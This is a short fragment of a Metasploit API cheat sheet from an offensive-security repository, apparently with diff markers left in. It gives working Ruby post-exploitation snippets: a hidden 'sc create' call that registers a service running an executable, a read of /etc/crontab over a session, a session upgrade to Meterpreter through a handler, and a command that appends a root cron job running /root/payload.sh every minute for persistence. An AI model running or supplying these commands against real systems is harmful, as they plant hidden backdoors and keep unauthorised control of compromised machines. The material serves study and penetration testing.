r00t-3xp10it/hacking-material-books/metasploit-RC[ERB]/metasploit-API/my-API-Cheat-sheet.md

       print_status("sc create #{sname} bin= \"C:\\Users\\Desktop\\fg.exe\"")
       proc = session.sys.process.execute("cmd.exe /c sc create #{sname} bin= \"C:\\Users\\Desktop\\fg.exe\"", nil, {'Hidden' => true})

+- **The shell.read() method provides the ability to read output from a shell session.**

+      session.shell_read("/etc/crontab")

+- **The session.shell_upgrade method will attempt to spawn a new Meterpreter session through an existing Shell session.**<br />
+'This requires that a multi/handler be running and that the host and port of this handler is provided to this method.'

+      session.shell_upgrade

 - **Executing a shell command (not meterpreter)**

       session.shell_command("echo \"* * * * * root /root/payload.sh\" >> /etc/crontab")